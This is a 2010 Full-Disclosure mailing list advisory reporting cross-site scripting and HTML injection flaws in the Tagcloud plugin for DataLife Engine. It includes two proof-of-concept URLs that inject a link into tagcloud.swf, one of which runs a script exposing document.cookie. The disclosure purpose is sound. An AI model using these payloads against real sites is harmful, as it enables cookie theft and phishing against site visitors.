[<prev] [next>] [day] [month] [year] [list]
Message-ID: <009101caa805$c6d2ff60$010000c0@ml>
Date: Sun, 7 Feb 2010 16:56:17 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Vulnerability in Tagcloud for DataLife Engine
Hello Full-Disclosure!
I want to warn you about Cross-Site Scripting vulnerability in Tagcloud
plugin for DataLife Engine (DLE). Which I found at 07.01.2010.
It is similar to XSS vulnerability in 3D Cloud for Joomla
(http://websecurity.com.ua/3883/). About millions of flash files
tagcloud.swf which are vulnerable to XSS attacks I mentioned in my article
XSS vulnerabilities in 34 millions flash files
(http://www.webappsec.org/lists/websecurity/archive/2010-01/msg00035.html).
XSS:
http://site/engine/classes/tagcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
Code will execute after click. It's strictly social XSS.
Also it's possible to conduct HTML Injection attack, including in those
flash files which have protection (in flash files or via WAF) against
javascript and vbscript URI in parameter tagcloud.
HTML Injection:
http://site/engine/classes/tagcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
Vulnerable are all versions of Tagcloud plugin.
I mentioned about this vulnerability at my site
(http://websecurity.com.ua/3927/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists